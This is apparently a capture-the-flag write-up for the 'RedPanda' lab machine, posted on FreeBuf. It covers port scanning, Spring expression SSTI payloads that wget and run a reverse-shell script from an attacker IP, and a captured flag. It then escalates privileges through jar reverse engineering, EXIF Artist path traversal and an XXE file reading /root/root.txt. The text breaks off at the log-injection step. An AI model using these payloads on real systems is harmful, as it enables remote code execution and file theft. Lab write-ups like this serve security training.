[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

Web安全

[Meachines] [Easy] RedPanda SSTI+Java逆向分析+XXE实体注入

maptnh 2025-03-01 17:59:00 14815

所属地海外

本文由 maptnh 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

Information Gathering

IP Address	Opening Ports
10.10.11.170	TCP:22,8080

$ ip='10.10.11.170'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
8080/tcp open  http-proxy
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sat, 01 Mar 2025 06:18:17 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en" dir="ltr">
|     <head>
|     <meta charset="utf-8">
|     <meta author="wooden_k">
|     <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
|     <link rel="stylesheet" href="css/panda.css" type="text/css">
|     <link rel="stylesheet" href="css/main.css" type="text/css">
|     <title>Red Panda Search | Made with Spring Boot</title>
|     </head>
|     <body>
|     <div class='pande'>
|     <div class='ear left'></div>
|     <div class='ear right'></div>
|     <div class='whiskers left'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='whiskers right'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='face'>
|     <div class='eye
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     Content-Length: 0
|     Date: Sat, 01 Mar 2025 06:18:17 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sat, 01 Mar 2025 06:18:18 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
|_http-title: Red Panda Search | Made with Spring Boot
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=3/1%Time=67C2AAC7%P=x86_64-pc-linux-gnu%r(Get
SF:Request,690,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;charset
SF:=UTF-8\r\nContent-Language:\x20en-US\r\nDate:\x20Sat,\x2001\x20Mar\x202
SF:025\x2006:18:17\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html
SF:>\n<html\x20lang=\"en\"\x20dir=\"ltr\">\n\x20\x20<head>\n\x20\x20\x20\x
SF:20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<meta\x20author=\"wooden
SF:_k\">\n\x20\x20\x20\x20<!--Codepen\x20by\x20khr2003:\x20https://codepen
SF:\.io/khr2003/pen/BGZdXw\x20-->\n\x20\x20\x20\x20<link\x20rel=\"styleshe
SF:et\"\x20href=\"css/panda\.css\"\x20type=\"text/css\">\n\x20\x20\x20\x20
SF:<link\x20rel=\"stylesheet\"\x20href=\"css/main\.css\"\x20type=\"text/cs
SF:s\">\n\x20\x20\x20\x20<title>Red\x20Panda\x20Search\x20\|\x20Made\x20wi
SF:th\x20Spring\x20Boot</title>\n\x20\x20</head>\n\x20\x20<body>\n\n\x20\x
SF:20\x20\x20<div\x20class='pande'>\n\x20\x20\x20\x20\x20\x20<div\x20class
SF:='ear\x20left'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='ear\x20ri
SF:ght'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='whiskers\x20left'>\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\x20\x2
SF:0\x20\x20<div\x20class='whiskers\x20right'>\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</d
SF:iv>\n\x20\x20\x20\x20\x20\x20<div\x20class='face'>\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20<div\x20class='eye")%r(HTTPOptions,75,"HTTP/1\.1\x20200\x2
SF:0\r\nAllow:\x20GET,HEAD,OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Sat
SF:,\x2001\x20Mar\x202025\x2006:18:17\x20GMT\r\nConnection:\x20close\r\n\r
SF:\n")%r(RTSPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/h
SF:tml;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435\
SF:r\nDate:\x20Sat,\x2001\x20Mar\x202025\x2006:18:18\x20GMT\r\nConnection:
SF:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HT
SF:TP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20
SF:type=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,
SF:\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x2
SF:0{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;
SF:}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height
SF::1px;background-color:#525D76;border:none;}</style></head><body><h1>HTT
SF:P\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html>
SF:");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSTI

http://10.10.11.170:8080/

payload:*{8*8}

name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('wget+http://10.10.16.33:9999/rev.sh').getInputStream())}

name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('chmod+777+rev.sh').getInputStream())}

name=*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('./rev.sh').getInputStream())}

User.txt

82505dbb5ab9adee0a0421d9b63840a7

Privilege Escalation:Java RE && XXE

$ scp -i ./id_rsa woodenk@10.10.11.170:/opt/credit-score/LogParser/final/target/final-1.0-jar-with-dependencies.jar ./

该过程解析日志文件，提取/opt/panda_search/redpanda.log访问 JPG 图片的请求信息，读取图片 Artist 属性，并更新并对应 /credits/<Artist>_creds.xml 文件中的访问统计数据。

需要构造Artist属性../来穿越目录,进行XXE。

对于/opt/panda_search/redpanda.log文件,当前用户存在于logs组,意味着允许修改

1.新增属性-Artist在/tmp/exp.jpg

$ exiftool -Artist="/../../../../../../../../../tmp/exp" exp.jpg

-Artist 属性用于设置或获取图片的 “作者” (Artist) 元数据，通常存储在 EXIF 或 XMP 元数据字段中，表示该图片的创建者或所有者。

2.构造/tmp/exp_creds.xml文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY file SYSTEM "/root/root.txt"> ]>
<credits>
 <author>xxx</author>
  <image>
    <uri>/../../../../../../tmp/exp.jpg</uri>
    <views>0</views>
    <data>&file;</data>
  </image>
  <totalviews>0</totalviews>
</credits>

3.注入/opt/panda_search/redpanda.log载荷,触发处理条件